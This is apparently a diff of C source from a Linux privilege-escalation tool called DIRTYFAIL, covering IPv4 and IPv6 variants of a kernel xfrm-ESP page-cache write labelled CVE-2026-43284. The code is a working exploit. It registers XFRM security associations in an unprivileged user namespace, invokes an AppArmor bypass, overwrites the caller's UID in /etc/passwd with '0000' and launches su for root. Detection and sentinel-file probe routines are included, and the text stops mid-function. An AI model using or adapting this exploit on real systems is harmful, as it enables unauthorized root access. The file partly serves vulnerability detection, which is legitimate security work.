if (splice(p[0], NULL, udp_send, NULL, 24 + 16, SPLICE_F_MOVE) != 40) {
log_bad("splice pipe->udp: %s", strerror(errno));
close(p[0]); close(p[1]); close(pfd);
close(udp_recv); close(udp_send); return false;
}
close(p[0]); close(p[1]);
/* Drive the receive — esp_input runs inline here, performs the
* scratch-write, and we don't really care about the actual recv
* data (auth will fail with EBADMSG).
*
* The usleep gives the kernel a hard guarantee that the in-place
* decrypt has finished and the page-cache STORE is visible before
* we tear down the sockets. On a busy or slow VM, splice() can
* return before esp_input has actually fired. V4bel's reference
* exploit uses the same 150ms wait. */
usleep(150 * 1000);
unsigned char drain[256];
(void)recv(udp_recv, drain, sizeof(drain), MSG_DONTWAIT);
close(pfd);
close(udp_recv);
close(udp_send);
return true;
}
/* Compatibility wrapper for the exploit path: target /etc/passwd. */
static bool trigger_store(off_t passwd_off)
{
return trigger_store_at("/etc/passwd", passwd_off);
}
__attribute__((unused))
static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid)
{
if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) {
log_bad("unshare: %s", strerror(errno));
return 1;
}
if (!write_proc("/proc/self/setgroups", "deny")) {
log_bad("setgroups deny: %s", strerror(errno));
return 1;
}
char map[64];
snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_uid);
if (!write_proc("/proc/self/uid_map", map)) {
log_bad("uid_map: %s", strerror(errno));
return 1;
}
snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_gid);
if (!write_proc("/proc/self/gid_map", map)) {
log_bad("gid_map: %s", strerror(errno));
return 1;
}
if (!bring_lo_up()) {
log_bad("bring lo up: %s", strerror(errno));
return 1;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) {
log_bad("AF_NETLINK XFRM: %s", strerror(errno));
return 1;
}
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("bind netlink: %s", strerror(errno));
close(nl); return 1;
}
if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl); return 1;
}
log_ok("XFRM SA registered with seq_hi='%s'", MARKER);
if (!trigger_store(passwd_off)) {
log_bad("trigger failed");
close(nl); return 1;
}
log_ok("ESP-in-UDP trigger fired");
close(nl);
return 0;
}
#else /* __linux__ */
__attribute__((unused))
static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid)
{
(void)passwd_off; (void)real_uid; (void)real_gid;
return 1;
}
#endif
/* ---------------------------------------------------------------- *
* INNER runs in the AA bypass userns (post-stage 2).
*
* No user interaction, no fork, no verify, no su. Just the kernel
* work: open netlink, register SA, fire splice trigger, exit.
* The parent (init ns) owns everything else.
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp_exploit_inner(void)
{
#ifdef __linux__
const char *user = getenv("DIRTYFAIL_TARGET_USER");
if (!user || !*user) {
log_bad("inner: DIRTYFAIL_TARGET_USER not set");
return DF_TEST_ERROR;
}
off_t uid_off; size_t uid_len; char uid_str[16];
if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("inner: find_passwd_uid_field('%s') failed", user);
return DF_TEST_ERROR;
}
if (uid_len != 4) {
log_bad("inner: UID '%s' is %zu chars; need 4", uid_str, uid_len);
return DF_TEST_ERROR;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) {
log_bad("inner: AF_NETLINK XFRM: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("inner: bind netlink: %s", strerror(errno));
close(nl);
return DF_EXPLOIT_FAIL;
}
if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl);
return DF_EXPLOIT_FAIL;
}
log_ok("inner: XFRM SA registered with seq_hi='%s'", MARKER);
if (!trigger_store(uid_off)) {
close(nl);
return DF_EXPLOIT_FAIL;
}
log_ok("inner: ESP-in-UDP trigger fired at uid_off=%lld",
(long long)uid_off);
close(nl);
return DF_EXPLOIT_OK;
#else
log_bad("dirtyfrag_esp_exploit_inner: Linux-only");
return DF_TEST_ERROR;
#endif
}
/* ---------------------------------------------------------------- *
* OUTER runs in init namespace.
*
* Prompts the operator, sets env vars, fork child arms AA bypass
* and runs the inner. Parent stays in init ns, waits, reads the
* global page cache to verify, then either:
* - do_shell=true: execlp("su", user) runs in init ns
* PAM reads modified /etc/passwd uid 0 real init-ns root
* - do_shell=false: try_revert_passwd_page_cache, return.
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp_exploit(bool do_shell)
{
log_step("Dirty Frag (xfrm-ESP) — exploit");
uid_t uid = getuid();
if (uid == 0) {
log_warn("already root in init namespace — nothing to escalate");
return DF_OK;
}
struct passwd *pw = getpwuid(uid);
if (!pw) { log_bad("getpwuid: %s", strerror(errno)); return DF_TEST_ERROR; }
const char *user = pw->pw_name;
off_t uid_off; size_t uid_len; char uid_str[16];
if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) {
log_bad("could not find %s in /etc/passwd", user);
return DF_TEST_ERROR;
}
log_step("/etc/passwd UID for %s: '%s' at offset %lld",
user, uid_str, (long long)uid_off);
if (uid_len != 4) {
log_bad("UID '%s' is %zu chars; this technique needs exactly 4",
uid_str, uid_len);
return DF_TEST_ERROR;
}
log_warn("about to run xfrm-ESP page-cache write against /etc/passwd");
log_warn("this enters a fresh user/net namespace, registers an XFRM SA, "
"and sends an ESP-in-UDP packet whose payload is the /etc/passwd "
"page from offset %lld", (long long)uid_off);
log_warn("on success the page cache will report '%s' as UID 0", user);
log_warn("cleanup: dirtyfail --cleanup, or `echo 3 > /proc/sys/vm/drop_caches`");
if (!typed_confirm("DIRTYFAIL")) {
log_bad("confirmation declined — aborting");
return DF_OK;
}
if (!ssh_lockout_check(user)) {
log_bad("SSH-lockout confirmation declined — aborting");
return DF_OK;
}
/* Hand off to the inner via env vars + AA bypass fork.
*
* The child fork enters the bypass userns, runs
* dirtyfrag_esp_exploit_inner (dispatched from main() based on
* DIRTYFAIL_INNER_MODE), modifies the global page cache, exits.
* We (parent, init ns) read the result via the same global page
* cache and execlp(su) here in init ns for REAL root. */
setenv("DIRTYFAIL_INNER_MODE", "esp", 1);
setenv("DIRTYFAIL_TARGET_USER", user, 1);
int rc = apparmor_bypass_fork_arm(0, NULL); /* argc/argv unused for forked variant */
if (rc != DF_EXPLOIT_OK) {
log_bad("inner exploit failed (exit=%d)", rc);
return DF_EXPLOIT_FAIL;
}
/* Verify in init namespace — page cache is global, so we see the
* child's modification here. */
int v = open("/etc/passwd", O_RDONLY);
if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; }
if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; }
char land[5] = {0};
if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; }
close(v);
if (memcmp(land, MARKER, 4) != 0) {
log_bad("write did not land — page cache reads '%.4s'", land);
return DF_EXPLOIT_FAIL;
}
log_ok("page cache now reports %s with uid 0", user);
if (!do_shell) {
if (try_revert_passwd_page_cache())
log_ok("page cache reverted (--no-shell)");
else
log_warn("page cache may still be modified — `sudo dirtyfail --cleanup` or reboot");
return DF_EXPLOIT_OK;
}
log_ok("invoking 'su %s' in init namespace — enter your password for REAL root", user);
execlp("su", "su", user, (char *)NULL);
log_bad("execlp: %s", strerror(errno));
return DF_EXPLOIT_FAIL;
}
/* ---------------------------------------------------------------- *
* Active probe used by `--scan --active`.
*
* Same userns + XFRM SA + splice-trigger setup as the exploit, but
* targets a sentinel file in /tmp instead of /etc/passwd. The parent
* (init ns) reads the sentinel after the child returns and looks for
* the marker bytes.
*
* If the marker landed kernel STORE is reachable DF_VULNERABLE.
* If the page is intact kernel is patched DF_OK.
* If AA blocks the bypass DF_PRECOND_FAIL.
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp_active_probe_inner(void)
{
#ifdef __linux__
const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL");
if (!sentinel || !*sentinel) {
log_bad("active-probe: DIRTYFAIL_PROBE_SENTINEL not set");
return DF_TEST_ERROR;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) {
log_bad("active-probe: netlink xfrm: %s", strerror(errno));
return DF_TEST_ERROR;
}
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("active-probe: bind netlink: %s", strerror(errno));
close(nl); return DF_TEST_ERROR;
}
if (!bring_lo_up()) {
log_bad("active-probe: bring lo up: %s", strerror(errno));
close(nl); return DF_TEST_ERROR;
}
if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl); return DF_TEST_ERROR;
}
if (!trigger_store_at(sentinel, 0)) {
close(nl); return DF_TEST_ERROR;
}
close(nl);
return DF_EXPLOIT_OK;
#else
return DF_TEST_ERROR;
#endif
}
df_result_t dirtyfrag_esp_active_probe(void)
{
/* Sentinel file: 4 KiB of 'A' bytes. */
char tmpl[] = "/tmp/dirtyfail-esp-probe.XXXXXX";
int sfd = mkstemp(tmpl);
if (sfd < 0) { log_bad("probe mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; }
unsigned char filler[4096];
memset(filler, 'A', sizeof(filler));
if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) {
close(sfd); unlink(tmpl); return DF_TEST_ERROR;
}
close(sfd);
/* Fault the page in. */
int rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
char tmp[4096];
if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) {
close(rfd); unlink(tmpl); return DF_TEST_ERROR;
}
close(rfd);
setenv("DIRTYFAIL_INNER_MODE", "esp-probe", 1);
setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1);
int rc = apparmor_bypass_fork_arm(0, NULL);
unsetenv("DIRTYFAIL_INNER_MODE");
unsetenv("DIRTYFAIL_PROBE_SENTINEL");
if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; }
if (rc != DF_EXPLOIT_OK) {
log_bad("active-probe inner failed (exit=%d)", rc);
unlink(tmpl); return DF_TEST_ERROR;
}
/* Re-read sentinel and search for marker. */
rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; }
unsigned char after[64];
ssize_t got = read(rfd, after, sizeof(after));
close(rfd);
unlink(tmpl);
if (got <= 0) return DF_TEST_ERROR;
for (int i = 0; i + 4 <= got; i++) {
if (memcmp(after + i, MARKER, 4) == 0) {
log_warn("ACTIVE PROBE: STORE landed at offset %d → kernel is VULNERABLE", i);
return DF_VULNERABLE;
}
}
log_ok("ACTIVE PROBE: page intact — kernel ESP path appears patched");
return DF_OK;
}
+40
View File
@@ -0,0 +1,40 @@
/*
* DIRTYFAIL dirtyfrag_esp.h
*
* Public surface for the Dirty Frag xfrm-ESP variant (CVE-2026-43284).
*/
#ifndef DIRTYFAIL_DIRTYFRAG_ESP_H
#define DIRTYFAIL_DIRTYFRAG_ESP_H
#include "common.h"
/* Run all preconditions for the xfrm-ESP primitive. Detection here is
* precondition-only: we do not register an SA in detect mode because
* doing so requires a fresh user namespace and side-effects loopback
* routing inside that namespace. Returns DF_VULNERABLE if all
* prerequisites are satisfied. */
df_result_t dirtyfrag_esp_detect(void);
/* OUTER (init namespace): user prompts → resolve target → fork →
* wait for child to do the kernel work read global page cache to
* verify if do_shell, execlp("su", user) in init ns for REAL
* init-ns root via PAM. */
df_result_t dirtyfrag_esp_exploit(bool do_shell);
/* INNER (bypass userns): runs after AA bypass stage 2. Reads
* DIRTYFAIL_TARGET_USER from env, registers XFRM SA with seq_hi
* "0000", fires the splice trigger. No prompts, no su, no verify
* the parent owns those. Exits with df_result_t cast to int. */
df_result_t dirtyfrag_esp_exploit_inner(void);
/* Active probe: fires the v4 ESP-in-UDP trigger against a /tmp sentinel
* file (never /etc/passwd) and reports whether the marker landed.
* Used by `--scan --active`. The inner half runs in the bypass userns
* and reads DIRTYFAIL_PROBE_SENTINEL for the target path. Returns
* DF_VULNERABLE on marker hit, DF_OK if patched, DF_PRECOND_FAIL on
* AA-block, DF_TEST_ERROR otherwise. */
df_result_t dirtyfrag_esp_active_probe(void);
df_result_t dirtyfrag_esp_active_probe_inner(void);
#endif
+698
View File
@@ -0,0 +1,698 @@
/*
* DIRTYFAIL dirtyfrag_esp6.c Dirty Frag IPv6 xfrm-ESP variant
* CVE-2026-43284 (IPv6 path)
*
* Reuses the same primitive shape as `dirtyfrag_esp.c`. See that file
* for the underlying root-cause analysis. This module differs only in
* the network-layer transport (AF_INET6 / ::1) and in padding the ESP
* frame to clear the v6-only size gate.
*/
#include "dirtyfrag_esp6.h"
#include "apparmor_bypass.h"
#include <fcntl.h>
#include <pwd.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/uio.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#ifdef __linux__
#include <sched.h>
#include <sys/syscall.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>
#include <linux/if.h>
#include <sys/ioctl.h>
extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out,
size_t len, unsigned int flags);
extern ssize_t vmsplice(int fd, const struct iovec *iov, unsigned long nr,
unsigned int flags);
#endif
#ifndef UDP_ENCAP
#define UDP_ENCAP 100
#endif
#ifndef UDP_ENCAP_ESPINUDP
#define UDP_ENCAP_ESPINUDP 2
#endif
#ifndef IPPROTO_ESP
#define IPPROTO_ESP 50
#endif
#define ENCAP_PORT 4500
#define ESP_SPI 0xDEADBE60
#define MARKER "0000"
#define ALG_NAME "authencesn(hmac(sha256),cbc(aes))"
/* xfrm6_input.c rejects skb->len < 48. Our wire layout is
* SPI(4)+seq(4)+IV(16)+target(16)+pad = 40+pad. Pad to 48 bytes. */
#define V6_PAD_BYTES 8
/* Empirical STORE-offset shift between v4 and v6 paths.
*
* In v4, the authencesn scratch-write at dst[assoclen+cryptlen]=dst[24]
* lands at file_offset == splice_off (we proved this end-to-end on Ubuntu
* 24.04, kernel 6.8.0-111). In v6, with our [hdr(24)][passwd(16)][pad(8)]
* wire layout, the STORE empirically lands at splice_off + 9. The exact
* source of the +9 isn't fully understood (likely a frag-vs-linear
* accounting wrinkle in esp6_input's skb_to_sgvec), but it is consistent
* across runs at this kernel revision.
*
* We compensate by splicing from passwd_off - V6_STORE_SHIFT, so the
* STORE lands at the intended target offset. Re-test on different kernel
* versions; this constant may need recalibration. */
#define V6_STORE_SHIFT 9
/* ---------------------------------------------------------------- *
* Detection
* ---------------------------------------------------------------- */
df_result_t dirtyfrag_esp6_detect(void)
{
log_step("Dirty Frag — IPv6 xfrm-ESP variant (CVE-2026-43284 v6 path) — detection");
int km = -1, kn = -1;
if (kernel_version(&km, &kn))
log_hint("kernel %d.%d.x", km, kn);
bool esp6 = kmod_loaded("esp6");
log_hint("esp6 currently loaded: %s", esp6 ? "yes" : "no");
bool userns = unprivileged_userns_allowed();
log_hint("unprivileged user namespace: %s", userns ? "allowed" : "DENIED");
if (!userns) {
log_ok("v6 xfrm-ESP variant unreachable without unprivileged userns");
log_hint("if you are on Ubuntu, try with --aa-bypass to defeat the restriction");
return DF_PRECOND_FAIL;
}
/* Quick AF_INET6 reachability probe. */
int s = socket(AF_INET6, SOCK_DGRAM, 0);
if (s < 0) {
log_ok("AF_INET6 unavailable (%s) — v6 path not reachable",
strerror(errno));
return DF_PRECOND_FAIL;
}
close(s);
if (apparmor_userns_caps_blocked()) {
log_ok("LSM-mitigated — same hardening that blocks v4 also blocks v6 "
"(unprivileged userns has no caps).");
return DF_PRECOND_FAIL;
}
if (dirtyfail_active_probes) {
log_step("--active set: firing v6 ESP-in-UDP trigger against /tmp sentinel");
df_result_t pr = dirtyfrag_esp6_active_probe();
if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr;
log_warn("active probe inconclusive — falling back to precondition verdict");
}
log_warn("VULNERABLE (preconditions met) — v6 xfrm SA registration available");
log_warn("Apply mainline patch f4c50a4034e6 (covers both v4 and v6)");
log_warn("Some distro backports may have shipped v4-only — test both paths");
log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe");
return DF_VULNERABLE;
}
/* ---------------------------------------------------------------- *
* Exploit
* ---------------------------------------------------------------- */
#ifdef __linux__
static bool wproc(const char *path, const char *value)
{
int fd = open(path, O_WRONLY);
if (fd < 0) return false;
ssize_t n = write(fd, value, strlen(value));
close(fd);
return n == (ssize_t)strlen(value);
}
static bool xfrm6_register_sa(int nl, const unsigned char seq_hi[4])
{
char buf[2048] = {0};
struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
struct xfrm_usersa_info *usa =
(struct xfrm_usersa_info *)NLMSG_DATA(nlh);
nlh->nlmsg_type = XFRM_MSG_NEWSA;
nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
nlh->nlmsg_seq = 1;
/* IPv6 selectors / SA addresses. ::1 = {0,...,0,1}. */
static const struct in6_addr loop6 = IN6ADDR_LOOPBACK_INIT;
memcpy(&usa->sel.daddr.a6, &loop6, 16);
memcpy(&usa->sel.saddr.a6, &loop6, 16);
usa->sel.family = AF_INET6;
usa->sel.prefixlen_d = 128;
usa->sel.prefixlen_s = 128;
memcpy(&usa->id.daddr.a6, &loop6, 16);
usa->id.spi = htonl(ESP_SPI);
usa->id.proto = IPPROTO_ESP;
memcpy(&usa->saddr.a6, &loop6, 16);
usa->lft.soft_byte_limit = (uint64_t)-1;
usa->lft.hard_byte_limit = (uint64_t)-1;
usa->lft.soft_packet_limit = (uint64_t)-1;
usa->lft.hard_packet_limit = (uint64_t)-1;
usa->reqid = 0x1234;
usa->family = AF_INET6; /* <-- v6 */
usa->mode = XFRM_MODE_TRANSPORT;
usa->replay_window = 0; /* SA-level: 0; ESN-level (below): 32 */
usa->flags = XFRM_STATE_ESN;
size_t hdrlen = sizeof(*nlh) + sizeof(*usa);
size_t attrs = 0;
char *abuf = buf + hdrlen;
/*
* Same authencesn-as-composition story as the v4 path see the
* comment block in dirtyfrag_esp.c::xfrm_register_sa for why we
* register two separate attributes instead of XFRMA_ALG_AEAD.
*/
{ /* XFRMA_ALG_AUTH_TRUNC */
struct xfrm_algo_auth *aa;
unsigned short dlen = sizeof(*aa) + 32;
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ALG_AUTH_TRUNC;
r->rta_len = RTA_LENGTH(dlen);
aa = (struct xfrm_algo_auth *)RTA_DATA(r);
memset(aa, 0, dlen);
strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1);
aa->alg_key_len = 32 * 8;
aa->alg_trunc_len = 128;
attrs += RTA_SPACE(dlen);
}
{ /* XFRMA_ALG_CRYPT */
struct xfrm_algo *ea;
unsigned short dlen = sizeof(*ea) + 16;
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ALG_CRYPT;
r->rta_len = RTA_LENGTH(dlen);
ea = (struct xfrm_algo *)RTA_DATA(r);
memset(ea, 0, dlen);
strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1);
ea->alg_key_len = 16 * 8;
attrs += RTA_SPACE(dlen);
}
{ /* XFRMA_REPLAY_ESN_VAL — same primitive input as v4 */
struct xfrm_replay_state_esn *esn;
unsigned short dlen = sizeof(*esn) + 4;
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_REPLAY_ESN_VAL;
r->rta_len = RTA_LENGTH(dlen);
esn = (struct xfrm_replay_state_esn *)RTA_DATA(r);
memset(esn, 0, dlen);
esn->bmp_len = 1;
esn->seq = 100;
memcpy(&esn->seq_hi, seq_hi, 4);
esn->replay_window = 32;
attrs += RTA_SPACE(dlen);
}
{ /* XFRMA_ENCAP — UDP/4500 */
struct xfrm_encap_tmpl *enc;
unsigned short dlen = sizeof(*enc);
struct rtattr *r = (struct rtattr *)(abuf + attrs);
r->rta_type = XFRMA_ENCAP;
r->rta_len = RTA_LENGTH(dlen);
enc = (struct xfrm_encap_tmpl *)RTA_DATA(r);
memset(enc, 0, dlen);
enc->encap_type = UDP_ENCAP_ESPINUDP;
enc->encap_sport = htons(ENCAP_PORT);
enc->encap_dport = htons(ENCAP_PORT);
attrs += RTA_SPACE(dlen);
}
nlh->nlmsg_len = hdrlen + attrs;
struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
if (sendto(nl, buf, nlh->nlmsg_len, 0,
(struct sockaddr *)&nladdr, sizeof(nladdr)) < 0)
return false;
char ack[4096];
ssize_t n = recv(nl, ack, sizeof(ack), 0);
if (n < (ssize_t)sizeof(struct nlmsghdr)) return false;
struct nlmsghdr *r = (struct nlmsghdr *)ack;
if (r->nlmsg_type == NLMSG_ERROR) {
struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(r);
if (e->error != 0) {
log_bad("XFRM_MSG_NEWSA(v6): %s", strerror(-e->error));
return false;
}
}
return true;
}
static bool bring_lo_up_v6(void)
{
int s = socket(AF_INET6, SOCK_DGRAM, 0);
if (s < 0) return false;
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1);
ifr.ifr_flags = IFF_UP | IFF_RUNNING;
int rc = ioctl(s, SIOCSIFFLAGS, &ifr);
close(s);
return rc == 0;
}
/* Generalized v6 trigger: splice from `target_path` at `splice_off`,
* len 16 bytes. The STORE lands at file_offset (splice_off + shift)
* where `shift` is empirically determined per-kernel (see
* calibrate_v6_shift below). Use this directly if you already know
* the shift; for the production exploit path, callers go through
* trigger_store_v6() which compensates automatically. */
static bool trigger_store_v6_at(const char *target_path, loff_t splice_off)
{
int udp_recv = socket(AF_INET6, SOCK_DGRAM, 0);
if (udp_recv < 0) return false;
struct sockaddr_in6 addr;
memset(&addr, 0, sizeof(addr));
addr.sin6_family = AF_INET6;
addr.sin6_port = htons(ENCAP_PORT);
addr.sin6_addr = in6addr_loopback;
int reuse = 1;
setsockopt(udp_recv, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse));
if (bind(udp_recv, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
log_bad("bind v6 udp_recv: %s", strerror(errno));
close(udp_recv); return false;
}
int encap = UDP_ENCAP_ESPINUDP;
if (setsockopt(udp_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {
log_bad("UDP_ENCAP v6: %s", strerror(errno));
close(udp_recv); return false;
}
int udp_send = socket(AF_INET6, SOCK_DGRAM, 0);
if (udp_send < 0) { close(udp_recv); return false; }
if (connect(udp_send, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
log_bad("connect v6 udp_send: %s", strerror(errno));
close(udp_recv); close(udp_send); return false;
}
/* Wire ESP header (24B) — same as v4. */
unsigned char wire_hdr[24];
*(uint32_t *)(wire_hdr + 0) = htonl(ESP_SPI);
*(uint32_t *)(wire_hdr + 4) = htonl(101);
memset(wire_hdr + 8, 0xCC, 16);
/* v6 padding to clear the size gate. */
unsigned char pad[V6_PAD_BYTES] = {0};
int pfd = open(target_path, O_RDONLY);
if (pfd < 0) {
log_bad("open %s: %s", target_path, strerror(errno));
close(udp_recv); close(udp_send); return false;
}
int p[2];
if (pipe(p) < 0) {
log_bad("pipe: %s", strerror(errno));
close(pfd); close(udp_recv); close(udp_send); return false;
}
/* Compose: hdr(24) || target@off(16) || pad(V6_PAD_BYTES) */
struct iovec iov_hdr = { .iov_base = wire_hdr, .iov_len = sizeof(wire_hdr) };
if (vmsplice(p[1], &iov_hdr, 1, 0) != (ssize_t)sizeof(wire_hdr)) {
log_bad("vmsplice hdr: %s", strerror(errno));
goto fail;
}
{
loff_t off = splice_off;
if (splice(pfd, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) {
log_bad("splice file->pipe: %s", strerror(errno));
goto fail;
}
}
{
struct iovec iov_pad = { .iov_base = pad, .iov_len = V6_PAD_BYTES };
if (vmsplice(p[1], &iov_pad, 1, 0) != V6_PAD_BYTES) {
log_bad("vmsplice pad: %s", strerror(errno));
goto fail;
}
}
if (splice(p[0], NULL, udp_send, NULL,
24 + 16 + V6_PAD_BYTES, SPLICE_F_MOVE)
!= 24 + 16 + V6_PAD_BYTES) {
log_bad("splice pipe->udp v6: %s", strerror(errno));
goto fail;
}
close(p[0]); close(p[1]);
/* See the comment in dirtyfrag_esp.c::trigger_store on why we
* need to wait before tearing down sockets. */
usleep(150 * 1000);
unsigned char drain[256];
(void)recv(udp_recv, drain, sizeof(drain), MSG_DONTWAIT);
close(pfd); close(udp_recv); close(udp_send);
return true;
fail:
close(p[0]); close(p[1]);
close(pfd); close(udp_recv); close(udp_send);
return false;
}
/* Calibrate V6_STORE_SHIFT empirically against a sentinel file in /tmp.
*
* We fire the v6 trigger once with marker bytes "0000" spliced from
* sentinel offset 0, then re-read the sentinel and find where "0000"
* landed. The offset is the kernel's STORE shift for this build of
* esp6_input. Caller then splices from `uid_off - shift` for the real
* exploit so the STORE lands exactly at uid_off.
*
* Returns shift in [0, 64) on success, or -1 if the marker didn't land
* at all (kernel may be patched, or trigger setup failed). */
static int calibrate_v6_shift(void)
{
/* Build a 4 KiB sentinel filled with a recognizable pattern that
* cannot collide with our marker "0000". We use ASCII 'A' bytes. */
char tmpl[] = "/tmp/dirtyfail-v6-cal.XXXXXX";
int sfd = mkstemp(tmpl);
if (sfd < 0) { log_bad("calibration: mkstemp: %s", strerror(errno)); return -1; }
unsigned char filler[4096];
memset(filler, 'A', sizeof(filler));
if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) {
close(sfd); unlink(tmpl); return -1;
}
close(sfd);
/* Fault the page in. */
int rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return -1; }
char tmp[4096];
if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) {
close(rfd); unlink(tmpl); return -1;
}
close(rfd);
/* Fire the trigger from sentinel offset 0. The trigger's wire
* packet carries seq_hi="0000" (MARKER), so the STORE writes those
* 4 bytes somewhere in the sentinel page. */
bool ok = trigger_store_v6_at(tmpl, 0);
if (!ok) {
log_bad("calibration: v6 trigger failed");
unlink(tmpl);
return -1;
}
/* Re-read the sentinel via a fresh fd (page-cache view, not disk). */
rfd = open(tmpl, O_RDONLY);
if (rfd < 0) { unlink(tmpl); return -1; }
unsigned char after[64];
ssize_t got = read(rfd, after, sizeof(after));
close(rfd);
unlink(tmpl);
if (got <= 0) return -1;
/* Search the first 64 bytes for the marker. We expect it to land
* within ~32 bytes of offset 0 based on prior empirical tests. */
for (int i = 0; i + 4 <= got; i++) {
if (memcmp(after + i, MARKER, 4) == 0) {
log_ok("v6 calibration: STORE landed at sentinel offset %d", i);
return i;
}
}
log_warn("v6 calibration: marker '%s' did not land in sentinel — "
"kernel may be patched, or trigger didn't fire", MARKER);
return -1;
}
/* Production v6 trigger: calibrates the shift on first call, then
* splices from passwd_off - shift so the STORE lands at passwd_off. */
static int g_v6_shift = -1; /* lazy-init by trigger_store_v6 */
static bool trigger_store_v6(off_t passwd_off)
{
if (g_v6_shift < 0) {
g_v6_shift = calibrate_v6_shift();
if (g_v6_shift < 0) {
log_warn("v6 calibration failed; falling back to hard-coded "
"V6_STORE_SHIFT=%d (may be wrong for this kernel)",
V6_STORE_SHIFT);
g_v6_shift = V6_STORE_SHIFT;
}
}
loff_t off = (passwd_off >= g_v6_shift) ? passwd_off - g_v6_shift : 0;
return trigger_store_v6_at("/etc/passwd", off);
}
__attribute__((unused))
static int run_v6_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid)
{
if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) {
log_bad("unshare v6: %s", strerror(errno));
return 1;
}
wproc("/proc/self/setgroups", "deny");
char m[64];
snprintf(m, sizeof(m), "0 %u 1", (unsigned)real_uid);
wproc("/proc/self/uid_map", m);
snprintf(m, sizeof(m), "0 %u 1", (unsigned)real_gid);
wproc("/proc/self/gid_map", m);
if (!bring_lo_up_v6()) {
log_bad("bring lo up (v6): %s", strerror(errno));
return 1;
}
int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
if (nl < 0) { log_bad("netlink xfrm: %s", strerror(errno)); return 1; }
struct sockaddr_nl nla = { .nl_family = AF_NETLINK };
if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) {
log_bad("bind netlink: %s", strerror(errno));
close(nl); return 1;
}
if (!xfrm6_register_sa(nl, (const unsigned char *)MARKER)) {
close(nl); return 1;
}
log_ok("v6 XFRM SA registered with seq_hi='%s'", MARKER);
if (!trigger_store_v6(passwd_off)) { close(nl); return 1; }
log_ok("v6 ESP-in-UDP trigger fired");
close(nl);
return 0;
}
#else
__attribute__((unused))
static int run_v6_in_userns(off_t a, uid_t b, gid_t c) {
(void)a; (void)b; (void)c; return 1;
}
#endif
/* INNER (bypass userns): SA reg + trigger only. */
df_result_t dirtyfrag_esp6_exploit_inner(void)
{
#ifdef __linux__
const char *user = getenv("DIRTYFAIL_TARGET_USER");
if (!user || !*user) {
log_bad("inner: DIRTYFAIL_TARGET_USER not set");
return DF_TEST_ERROR;
}
off_t uid_off; size_t uid_len; char uid_str[16];
